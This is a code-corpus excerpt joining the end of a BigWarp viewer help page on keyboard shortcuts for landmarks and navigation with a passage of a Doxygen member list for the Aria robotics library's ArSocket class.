border-left: 1px solid black;
border-bottom: 1px solid black;
}
td.a
{
text-align:center;
}
body
{
background-color:white;
margin-left:10px;
}
</style>
<body>
<h2>Sources and display modes</h2>
<p>
The viewer can display files containing multiple sources.
</p>
<p>
The viewer has two display modes, <i>single-source</i> and <i>fused</i>.
In <i>single-source</i> mode, only the <i>current</i> source is shown
(there is exactly one current source at any given time.)
In <i>fused</i> mode, all <i>active</i> sources are shown overlaid.
</p>
<table border="1">
<tr>
<td class="a"><b>P</b></td>
<td>Open source card for editing source visualization modes, color, brightness, and contrast.</td>
</tr>
<tr>
<td class="a"><b>Shift  P</b> or <b>Escape</b></td>
<td>Close source card.</td>
</tr>
<tr>
<td class="a"><b>F</b></td>
<td>Switch between <i>single-source</i> and <i>fused</i> mode.</td>
</tr><tr>
<td class="a"><b>G</b></td>
<td>Toggle source <i>grouping</i>.</td>
</tr><tr>
<td class="a"><b>I</b></td>
<td>Switch between tri-linear and nearest-neighbor interpolation.</td>
</tr><tr>
<td class="a"><b>T </b></td>
<td>Toggle whether moving image is displayed warped or raw. </td>
</tr><tr>
<td class="a"><b>Ctrl  Shift T </b></td>
<td>Print a representation of the transformation.</td>
</tr><tr>
<td class="a"><b>S</b></td>
<td>Show Brightness & Color dialog.</td>
</tr><tr>
<td class="a"><b>F2</b></td>
<td>Show transform type selection dialog.</td>
</tr><tr>
<td class="a"><b>F3</b></td>
<td>Show moving image panel Visibility & and Grouping dialog.</td>
</tr><tr>
<td class="a"><b>F4</b></td>
<td>Show target image panel Visibility & and Grouping dialog.</td>
</tr><tr>
<td class="a"><b>U </b></td>
<td>Show warp visualization grid dialog.</td>
</tr><tr>
<td class="a"><b>Ctrl O</b></td>
<td>Open landmarks from a file</td>
</tr><tr>
<td class="a"><b>Ctrl S</b></td>
<td>Save landmarks to a file</td>
</tr><tr>
<td class="a"><b>Ctrl Q</b></td>
<td>Quick save landmarks</td>
</tr><tr>
<td class="a"><b>Ctrl E</b></td>
<td>Export the transformed moving image. </td>
</tr><tr>
<td class="a"><b>Ctrl Shift E</b></td>
<td>Export a BDV/XML of the transformed moving image. </td>
</tr><tr>
<td class="a"><b>Ctrl W</b></td>
<td>Export displacement (warp) field as an ImagePlus.</td>
</tr>
<tr>
<td class="a"><b>Ctrl A</b></td>
<td>Print affine transformation (or affine part of warp transformation) to the log / terminal.</td>
</tr>
</table>
<br/>
<h2>Navigation</h2>
<p>
Using the mouse:
</p>
<table border="1">
<tr>
<td class="a"><b>Left-drag</b></td>
<td>Rotate (pan and tilt) around the point where the mouse was clicked.</td>
</tr><tr>
<td class="a"><b>Right-drag</b> or<br/><b>Middle-drag</b></td>
<td>Move in the xy-plane.</td>
</tr><tr>
<td class="a"><b>Scroll</b></td>
<td>Move along the z-axis.</td>
</tr><tr>
<td class="a"><b>Meta Scroll</b> or<br/><b>Ctrl Shift Scroll</b></td>
<td>Zoom in and out.</td>
</tr>
</table>
<p>
Using the keyboard:
</p>
<table border="1">
<tr>
<td class="a"><b>Q <i>key</i></b></td>
<td>Align the non-active viewer with the active viewer.</td>
</tr>
<tr>
<td class="a"><b>W <i>key</i></b></td>
<td>Align the active viewer with the non-active viewer.</td>
<tr>
<td class="a"><b>E <i>key</i></b></td>
<td>Center the viewer at the nearest landmark (in 3d)</td>
</tr><tr>
<td class="a"><b>R <i>key</i></b></td>
<td>Resets view to origin.</td>
</tr><tr>
<td class="a"><b>D <i>key</i></b></td>
<td>Centers the active viewer on the currently selected landmark.</td>
</tr><tr>
<td class="a"><b>Ctrl D</b></td>
<td>Centers the active viewer on the next selected landmark.</td>
</tr><tr>
<td class="a"><b>Ctrl-Shift D</b></td>
<td>Centers the active viewer on the previous selected landmark.</td>
</tr>
<tr>
<td class="a"><b>X</b> / <b>Y</b> / <b>Z</b></td>
<td>Select rotation axis.</td>
</tr><tr>
<td class="a"><b>←</b> / <b>→</b></td>
<td>Rotate clockwise / counter-clockwise around the choosen rotation axis.</td>
</tr><tr>
<td class="a"><b>↑</b> / <b>↓</b></td>
<td>Zoom in / out.</td>
</tr><tr>
<td class="a"><b>,</b> / <b>.</b></td>
<td>Move forward / backward along the z-axis.</td>
</tr><tr>
<td class="a"><b>Shift Y</b> or <b>Shift A</b></td>
<td> 3d: Rotate to the xz-plane of the current source. (Look along the y-axis of the current source.)</td>
</tr><tr>
<td class="a"><b>Shift X</b></td>
<td> 3d: Rotate to the zy-plane of the current source. (Look along the x-axis of the current source.)<br>
2d: Rotate clockwise to the next 90 degree rotation of the image</td>
</tr><tr>
<td class="a"><b>Shift Z</b></td>
<td> 3d: Rotate to the xy-plane of the current source. (Look along the z-axis of the current source.)<br>
2d: Rotate counterclockwise to the next 90 degree rotation of the image </td>
</tr>
</table>
<p>
Hold <b>Shift</b> to rotate and browse 10x faster.<br/>
Hold <b>Ctrl</b> to rotate and browse 10x slower.
</p>
<h2>Landmark placement and navigation</h2>
<p>
Landmarks are placed in <i>landmark mode</i> which is toggled by
pressing the <i>space bar</i>. A message is briefly displayed
in viewer windows to indicate that you are in landmark mode.
</p>
<table border="1">
<tr>
<td class="a"><b>Space bar</b><br/></td>
<td>Toggle <i>landmark mode</i> (press to enter, press again to exit).</td>
</tr>
<tr>
<td class="a">(<b>Landmark mode</b>) + ( left click )</td>
<td>Place landmark point.</td>
</tr>
<tr>
<td class="a">(<b>Landmark mode</b>) + ( left click-drag a landmark)</td>
<td>Drag an existing landmark point.</td>
</tr>
<tr>
<td class="a">(<b>Landmark mode</b>) + <b>Shift</b> + ( mouse drag )</td>
<td>"Move" a point. <br>Click to place a landmark in the moving image
space, drag to move a landmark in the fixed image, release to set the fixed image landmark.</td>
</tr>
<tr>
<td class="a">(<b>Landmark mode</b>) + <b>Ctrl</b> + ( mouse click )</td>
<td>"Fix" a point. <br>Click to place a landmark in both the fixed and
moving images, at the clicked position.</td>
</tr>
<tr>
<td class="a">Right-click point in table.</td>
<td>Bring up menu for deleting / activating landmark points</td>
</tr>
<tr>
<td class="a">Double click point in table.</td>
<td>Center landmark point in viewer.</td>
</tr>
<tr>
<td class="a"><b>Ctrl Z</b></td>
<td>Undo last change to a landmark point.</td>
</tr>
<tr>
<td class="a"><b>Ctrl Y</b></td>
<td>Redo last undone change to a landmark point.</td>
</tr>
<tr>
<td class="a"><b>V</b></td>
<td>Toggle landmark visibility.</td>
</tr>
<tr>
<td class="a"><b>N</b></td>
<td>Toggle landmark name visibility.</td>
</tr>
</table>
<br/>
<h2>Landmark selection and editing</h2>
<table border="1">
<tr>
<td class="a">(left-mouse-click)</td>
<td>Select row.</td>
</tr>
<tr>
<td class="a"><b>Ctrl</b> + (left-mouse-click)</td>
<td>Add row to selection.</td>
</tr>
<tr>
<td class="a"><b>Shift</b> + (left-mouse-click)</td>
<td>Select range of rows.</td>
</tr>
<tr>
<td class="a"><b>Shift Escape</b></td>
<td>Deselect all rows.</td>
</tr>
<tr>
<td class="a">(right-mouse-click) → "Delete" </td>
<td>Delete all selected row(s).</td>
</tr>
<tr>
<td class="a">(right-mouse-click) → "Clear moving" </td>
<td>Deletes only the moving landmark point.</td>
</tr>
<tr>
<td class="a">(right-mouse-click) → "Clear fixed" </td>
<td>Deletes only the fixed landmark point.</td>
</tr>
<tr>
<td class="a">(right-mouse-click) → "Activate" </td>
<td>Activates all selected landmark pairs.</td>
</tr>
<tr>
<td class="a">(right-mouse-click) → "Deactivate" </td>
<td>Deactivates all selected landmark pairs.</td>
</tr>
</table>
<h2>Landmark table warnings</h2>
<p>
If your transformation unstable (or close to), BigWarp may not be able to correctly display landmarks on the warped moving image.
The name of a landmark in the table will be highlighted yellow.
<h3>Possible fixes</h3>
See the <a href="https://imagej.net/BigWarp">BigWarp wiki page</a> for details.
<ul>
<li>Modify landmarks</li>
<li>Increase "Max iterations" in Setting > BigWarp Options window </li>
<li>Increase "Inverse error" in Setting > BigWarp Options window </li>
</ul>
</p>
</body>
</html>
|
docs/classArSocket-members.html | charismaticchiu/Robotics | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1">
<title>Aria: Member List</title>
<link href="doxygen.css" rel="stylesheet" type="text/css">
</head><body>
<!-- Generated by Doxygen 1.4.2 -->
<div class="qindex"><a class="qindex" href="main.html">Main Page</a> | <a class="qindex" href="hierarchy.html">Class Hierarchy</a> | <a class="qindex" href="classes.html">Alphabetical List</a> | <a class="qindex" href="annotated.html">Class List</a> | <a class="qindex" href="files.html">File List</a> | <a class="qindex" href="functions.html">Class Members</a> | <a class="qindex" href="globals.html">File Members</a> | <a class="qindex" href="pages.html">Related Pages</a> | <a class="qindex" href="examples.html">Examples</a></div>
<h1>ArSocket Member List</h1>This is the complete list of members for <a class="el" href="classArSocket.html">ArSocket</a>, including all inherited members.<p><table>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a0">accept</a>(ArSocket *sock)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#e0">addrHost</a>(struct in_addr &addr, char *host)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [static]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a3">ArSocket</a>()</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a2">ArSocket</a>(const char *host, int port, Type type)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a1">ArSocket</a>(int port, bool doClose, Type type)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a4">clearPartialReadString</a>(void)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a5">close</a>()</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a6">comparePartialReadString</a>(const char *partialString)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr bgcolor="#f0f0f0"><td><b>ConBadHost</b> enum value (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a7">connect</a>(const char *host, int port, Type type=TCP, const char *openOnIP=NULL)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a9">connectTo</a>(const char *host, int port)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a8">connectTo</a>(struct sockaddr_in *sin)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr bgcolor="#f0f0f0"><td><b>ConNoRoute</b> enum value (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr bgcolor="#f0f0f0"><td><b>ConRefused</b> enum value (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a11">copy</a>(int fd, bool doclose)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a10">copy</a>(ArSocket *s)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a12">create</a>(Type type)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#b0">doStringEcho</a>(void)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>Error</b> enum name (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a13">findValidPort</a>(int startPort, const char *openOnIP=NULL)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a14">getBadRead</a>(void) const </td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a15">getBadWrite</a>(void) const </td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a16">getBytesRecvd</a>(void)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a17">getBytesSent</a>(void)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a18">getCloseCallback</a>(void)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a19">getEcho</a>(void)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a20">getError</a>() const </td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a21">getErrorStr</a>() const </td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a22">getErrorTracking</a>(void)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a23">getFD</a>() const </td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#e1">getHostName</a>()</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [static]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a24">getIPString</a>(void) const </td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a25">getLastStringReadTime</a>(void)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a26">getLogWriteStrings</a>(void)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a27">getRawIPString</a>(void) const </td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a28">getRecvs</a>(void)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a29">getSends</a>(void)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a30">getSockName</a>()</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a31">getStringUseWrongEndChars</a>(void)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a32">getType</a>() const </td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#e2">hostAddr</a>(const char *host, struct in_addr &addr)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [static]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#e3">hostToNetOrder</a>(int i)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [static]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a33">inAddr</a>()</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#e4">init</a>()</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [static]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a34">inPort</a>()</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>internalInit</b>(void) (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#e5">inToA</a>(struct in_addr *addr, char *buff)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [static]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#e6">maxHostNameLen</a>()</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline, static]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myBadRead</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myBadWrite</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myBytesRecvd</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myBytesSent</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myCloseFunctor</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myDoClose</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myError</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myErrorStr</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myErrorTracking</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myFD</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myIPString</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myLastStringReadTime</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myLogWriteStrings</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myNonBlocking</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myRawIPString</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myReadStringMutex</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myRecvs</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>mySends</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>mySin</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myStringAutoEcho</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myStringBuf</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myStringBufEmpty</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myStringEcho</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myStringGotComplete</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myStringGotEscapeChars</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myStringHaveEchoed</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myStringIgnoreReturn</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myStringPos</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myStringPosLast</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myStringWrongEndChars</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myType</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>myWriteStringMutex</b> (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>NameLookup</b> enum value (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr bgcolor="#f0f0f0"><td><b>NetFail</b> enum value (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#e7">netToHostOrder</a>(int i)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [static]</code></td></tr>
<tr bgcolor="#f0f0f0"><td><b>NoErr</b> enum value (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a35">open</a>(int port, Type type, const char *openOnIP=NULL)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#s0">ourInitialized</a></td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [static]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a36">read</a>(void *buff, size_t len, unsigned int msWait=0)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a37">readString</a>(unsigned int msWait=0)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a38">recvFrom</a>(void *msg, int len, sockaddr_in *sin)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a39">resetTracking</a>(void)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a41">sendTo</a>(const void *msg, int len)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a40">sendTo</a>(const void *msg, int len, struct sockaddr_in *sin)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr bgcolor="#f0f0f0"><td><b>separateHost</b>(const char *rawHost, int rawPort, char *useHost, size_t useHostSize, int *port) (defined in <a class="el" href="classArSocket.html">ArSocket</a>)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a42">setBroadcast</a>()</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a43">setCloseCallback</a>(ArFunctor *functor)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a44">setDoClose</a>(bool yesno)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a45">setEcho</a>(bool echo)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a46">setErrorTracking</a>(bool errorTracking)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a47">setIPString</a>(const char *ipString)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a48">setLinger</a>(int time)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a49">setLogWriteStrings</a>(bool logWriteStrings)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a50">setNoDelay</a>(bool flag)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a51">setNonBlock</a>()</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#b3">setRawIPString</a>(void)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [protected]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a52">setReadStringIgnoreReturn</a>(bool ignore)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a53">setReuseAddress</a>()</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a54">setStringUseWrongEndChars</a>(bool useWrongEndChars)</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#e8">shutdown</a>()</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [static]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#a55">sockAddrIn</a>()</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArSocket.html#e9">sockAddrLen</a>()</td><td><a class="el" href="classArSocket.html">ArSocket</a></td><td><code> [inline, static]</code></td></tr>
